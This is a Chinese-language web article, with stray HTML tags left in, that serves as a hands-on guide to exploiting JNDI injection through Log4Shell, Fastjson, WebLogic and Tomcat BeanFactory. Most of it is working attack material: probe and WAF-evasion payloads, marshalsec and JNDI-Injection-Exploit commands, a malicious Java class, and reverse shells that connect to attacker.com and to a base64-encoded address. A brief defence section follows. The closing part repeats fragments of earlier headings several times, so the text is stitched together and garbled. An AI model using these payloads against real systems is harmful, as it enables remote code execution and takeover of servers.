JNDI注入漏洞实战指南<\/h1>

一、JNDI注入原理<\/h2>
JNDI(Java Naming and Directory Interface)是Java提供的统一资源访问接口，支持通过名称(如`ldap:\/\/example.com\/obj<\/code>)动态加载远程对象。当攻击者能控制JNDI的查找地址(如输入参数被拼接到InitialContext.lookup()<\/code>中)时，可指向恶意服务器地址，触发目标加载远程恶意类(如.class<\/code>或.jar<\/code>)，最终实现RCE。<\/p>`

关键依赖条件<\/h3>

目标应用使用低版本Java(JDK ≤ 8u191\/11.0.1\/7u201\/6u211，这些版本未默认关闭远程类加载)<\/li>
存在未过滤的输入点传递给JNDI接口(如日志打印、参数解析等)<\/li>
<\/ul>
二、黑盒发现JNDI注入漏洞<\/h2>
1. 识别潜在输入点<\/h3>

HTTP参数\/Headers\/Cookie<\/strong>：例如username=${jndi:ldap:\/\/xxx}<\/code><\/li>
文件上传\/下载功能<\/strong>：文件名、文件内容中嵌入JNDI Payload<\/li>
API接口<\/strong>：JSON\/XML数据中的字段(如用户注册信息、订单信息)<\/li>
日志上下文<\/strong>：如User-Agent、Referer等可能被Log4j2记录的位置<\/li>
<\/ul>
2. 构造探测Payload<\/h3>
基础Payload<\/h4>

DNSLog回显验证：${jndi:ldap:\/\/${sys:java.version}.xxx.dnslog.cn}<\/code><\/li>
RMI协议验证：${jndi:rmi:\/\/attacker.com:1099\/exploit}<\/code><\/li>
<\/ul>
绕过WAF的变形<\/h4>

大小写混淆：${${lower:j}ndi:ldap:\/\/xxx}<\/code><\/li>
URL解析特性：${jndi:ldap:\/\/127.0.0.1#.xxx.dnslog.cn}<\/code><\/li>
Base64编码：${jndi:ldap:\/\/127.0.0.1:1234\/Basic\/Command\/Base64\/[base64-encoded-cmd]}<\/code><\/li>
<\/ul>
3. 使用工具辅助验证<\/h3>

DNSLog平台<\/strong>：生成临时域名(如ceye.io<\/code>、dnslog.cn<\/code>)，观察DNS请求记录<\/li>
Burp Collaborator<\/strong>：生成Collaborator地址替换到Payload中，检查HTTP\/DNS交互<\/li>
<\/ul>
三、JNDI注入利用步骤<\/h2>
1. 环境准备<\/h3>
恶意服务器搭建<\/h4>
使用工具快速启动LDAP\/RMI恶意服务：<\/p>
# 使用marshalsec工具<\/span>
<\/span><\/span>java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http:\/\/attacker.com\/#ExploitClass"<\/span>
<\/span><\/span>
<\/span><\/span># 使用JNDI-Injection-Exploit工具<\/span>
<\/span><\/span>java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvOTAwMSAwPiYx}|{base64,-d}|{bash,-i}"<\/span> -A 127.0.0.1
<\/span><\/span><\/code><\/pre>恶意类文件托管<\/h4>
在Web服务器上托管恶意.class<\/code>或.jar<\/code>文件：<\/p>
python -m http.server 8080<\/span>
<\/span><\/span><\/code><\/pre>2. 生成恶意Payload<\/h3>
简单命令执行<\/h4>
${jndi:ldap:\/\/attacker.com:1389\/Exploit}<\/code><\/p>
反弹Shell(需编码绕过特殊字符)<\/h4>
public<\/span> class<\/span> Exploit<\/span> {<\/span>
<\/span><\/span>    static<\/span> {<\/span>
<\/span><\/span>        try<\/span> {<\/span>
<\/span><\/span>            Runtime.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>"bash -c {echo,<base64-encoded-cmd>}|{base64,-d}|{bash,-i}"<\/span>);<\/span>
<\/span><\/span>        }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {}<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>3. 触发漏洞<\/h3>
将构造的Payload发送到目标输入点(如HTTP请求参数、文件上传等)，观察恶意服务器日志确认目标是否请求了恶意类文件：<\/p>
[LDAP] Send LDAP reference result for Exploit redirecting to http:\/\/attacker.com\/Exploit.class
<\/code><\/pre>
4. 绕过限制<\/h3>
高版本Java利用(JDK > 8u191)<\/h4>

利用本地类(如Tomcat ELProcessor、Groovy等)进行二次攻击<\/li>
<\/ul>
上下文限制<\/h4>

分块传输<\/li>
编码混淆(如Unicode、Hex)<\/li>
<\/ul>
四、典型案例分析<\/h2>
1. Fastjson反序列化漏洞中的JNDI注入<\/h3>
漏洞原理<\/h4>
Fastjson 1.2.24及以下版本的反序列化功能存在缺陷，攻击者可通过@type<\/code>属性指定恶意类(如com.sun.rowset.JdbcRowSetImpl<\/code>)，触发setDataSourceName()<\/code>和setAutoCommit()<\/code>方法，进而通过JNDI加载远程恶意类实现RCE。<\/p>
利用步骤<\/h4>

构造恶意RMI服务：<\/li>
<\/ol>
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http:\/\/attacker.com\/#Exploit
<\/span><\/span><\/code><\/pre>
托管恶意类<\/li>
发送构造的JSON Payload至目标Fastjson反序列化接口<\/li>
<\/ol>
绕过WAF技巧<\/h4>

编码混淆：如%6a%6e%64%69<\/code>代替jndi<\/code><\/li>
分块传输<\/li>
<\/ul>
2. Log4j2的Log4Shell漏洞(CVE-2021-44228)<\/h3>
漏洞原理<\/h4>
Log4j2在记录日志时，若日志内容包含${jndi:ldap:\/\/...}<\/code>格式的字符串，会触发JNDI解析，动态加载远程恶意类。<\/p>
利用步骤<\/h4>

注入到HTTP请求头：<\/li>
<\/ol>
GET \/ HTTP\/1.1
User-Agent: ${jndi:ldap:\/\/attacker.com:1389\/Exploit}
<\/code><\/pre>

搭建LDAP服务：<\/li>
<\/ol>
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -i >& \/dev\/tcp\/attacker.com\/4444 0>&1"<\/span> -A attacker.com
<\/span><\/span><\/code><\/pre>绕过WAF技巧<\/h4>

协议切换：ldap:\/\/<\/code>、dns:\/\/<\/code>或rmi:\/\/<\/code>混合<\/li>
嵌套表达式：如${${lower:j}ndi:ldap:\/\/...}<\/code><\/li>
<\/ul>
3. Oracle WebLogic JNDI注入(CVE-2024-20931)<\/h3>
漏洞原理<\/h4>
WebLogic未对JNDI查找接口的输入进行过滤，攻击者可控制lookup()<\/code>参数，通过LDAP协议加载远程恶意类。<\/p>
复现步骤<\/h4>

启动漏洞环境：<\/li>
<\/ol>
docker run -dit -p 7001:7001 ismaleiva90\/weblogic12
<\/span><\/span><\/code><\/pre>
生成Base64编码的反弹Shell命令<\/li>
启动JNDI注入工具<\/li>
<\/ol>
4. Tomcat BeanFactory绕过JDK高版本限制<\/h3>
漏洞背景<\/h4>
JDK 8u191及以上版本默认禁用远程类加载，但可通过Tomcat的BeanFactory<\/code>类实现绕过。<\/p>
利用流程<\/h4>

服务端构造恶意Reference：<\/li>
<\/ol>
ResourceRef ref =<\/span> new<\/span> ResourceRef(<\/span>"javax.el.ELProcessor"<\/span>,<\/span> null<\/span>,<\/span> true<\/span>);<\/span>
<\/span><\/span>ref.<\/span>add<\/span>(<\/span>new<\/span> StringRefAddr(<\/span>"forceString"<\/span>,<\/span> "x=eval"<\/span>));<\/span>
<\/span><\/span>ref.<\/span>add<\/span>(<\/span>new<\/span> StringRefAddr(<\/span>"x"<\/span>,<\/span> "Runtime.getRuntime().exec(\"calc\")"<\/span>));<\/span>
<\/span><\/span>ReferenceWrapper wrapper =<\/span> new<\/span> ReferenceWrapper(<\/span>ref);<\/span>
<\/span><\/span>registry.<\/span>bind<\/span>(<\/span>"calc"<\/span>,<\/span> wrapper);<\/span>
<\/span><\/span><\/code><\/pre>
客户端调用lookup("rmi:\/\/attacker.com:1099\/calc")<\/code><\/li>
<\/ol>
五、防御建议<\/h2>


升级依赖<\/strong>：<\/p>

升级Log4j2到≥2.17.1，设置log4j2.formatMsgNoLookups=true<\/code><\/li>
<\/ul>
<\/li>

代码层面<\/strong>：<\/p>

避免将用户输入直接传递给InitialContext.lookup()<\/code><\/li>
<\/ul>
<\/li>

环境加固<\/strong>：<\/p>

使用JDK ≥ 8u191\/11.0.1<\/li>
设置com.sun.jndi.ldap.object.trustURLCodebase=false<\/code><\/li>
<\/ul>
<\/li>

WAF规则<\/strong>：<\/p>

拦截包含${jndi:<\/code>、$%7Bjndi:<\/code>等模式的请求<\/li>
<\/ul>
<\/li>
<\/ol>
六、总结<\/h2>

发现重点<\/strong>：寻找所有可能的输入点，通过DNSLog快速验证漏洞存在<\/li>
利用难点<\/strong>：绕过高版本JDK限制(需结合其他漏洞链)<\/li>
实战技巧<\/strong>：善用工具(如marshalsec、JNDI-Injection-Exploit)和混淆技术，优先在测试环境中验证Payload<\/li>
<\/ul>

JNDI注入漏洞实战指南<\/h1>

二、黑盒发现JNDI注入漏洞<\/h2>

2. 构造探测Payload<\/h3>

三、JNDI注入利用步骤<\/h2>

1. 环境准备<\/h3>

2. 生成恶意Payload<\/h3>

简单命令执行<\/h4>
`${jndi:ldap:\/\/attacker.com:1389\/Exploit}<\/code><\/p>`

4. 绕过限制<\/h3>

四、典型案例分析<\/h2>

1. Fastjson反序列化漏洞中的JNDI注入<\/h3>

2. Log4j2的Log4Shell漏洞(CVE-2021-44228)<\/h3>

漏洞原理<\/h4>
Log4j2在记录日志时，若日志内容包含`${jndi:ldap:\/\/...}<\/code>格式的字符串，会触发JNDI解析，动态加载远程恶意类。<\/p>`

3. Oracle WebLogic JNDI注入(CVE-2024-20931)<\/h3>

漏洞原理<\/h4>
WebLogic未对JNDI查找接口的输入进行过滤，攻击者可控制`lookup()<\/code>参数，通过LDAP协议加载远程恶意类。<\/p>`

4. Tomcat BeanFactory绕过JDK高版本限制<\/h3>

漏洞背景<\/h4>
JDK 8u191及以上版本默认禁用远程类加载，但可通过Tomcat的`BeanFactory<\/code>类实现绕过。<\/p>`

JNDI注入漏洞实战指南<\/h1>

二、黑盒发现JNDI注入漏洞<\/h2>

2. 构造探测Payload<\/h3>

三、JNDI注入利用步骤<\/h2>

1. 环境准备<\/h3>

2. 生成恶意Payload<\/h3>

简单命令执行<\/h4> ${jndi:ldap:\/\/attacker.com:1389\/Exploit}<\/code><\/p>

4. 绕过限制<\/h3>

四、典型案例分析<\/h2>

1. Fastjson反序列化漏洞中的JNDI注入<\/h3>

2. Log4j2的Log4Shell漏洞(CVE-2021-44228)<\/h3>

漏洞原理<\/h4> Log4j2在记录日志时，若日志内容包含${jndi:ldap:\/\/...}<\/code>格式的字符串，会触发JNDI解析，动态加载远程恶意类。<\/p>

3. Oracle WebLogic JNDI注入(CVE-2024-20931)<\/h3>

漏洞原理<\/h4> WebLogic未对JNDI查找接口的输入进行过滤，攻击者可控制lookup()<\/code>参数，通过LDAP协议加载远程恶意类。<\/p>

4. Tomcat BeanFactory绕过JDK高版本限制<\/h3>

漏洞背景<\/h4> JDK 8u191及以上版本默认禁用远程类加载，但可通过Tomcat的BeanFactory<\/code>类实现绕过。<\/p>

简单命令执行<\/h4>
`${jndi:ldap:\/\/attacker.com:1389\/Exploit}<\/code><\/p>`

漏洞原理<\/h4>
Log4j2在记录日志时，若日志内容包含`${jndi:ldap:\/\/...}<\/code>格式的字符串，会触发JNDI解析，动态加载远程恶意类。<\/p>`

漏洞原理<\/h4>
WebLogic未对JNDI查找接口的输入进行过滤，攻击者可控制`lookup()<\/code>参数，通过LDAP协议加载远程恶意类。<\/p>`

漏洞背景<\/h4>
JDK 8u191及以上版本默认禁用远程类加载，但可通过Tomcat的`BeanFactory<\/code>类实现绕过。<\/p>`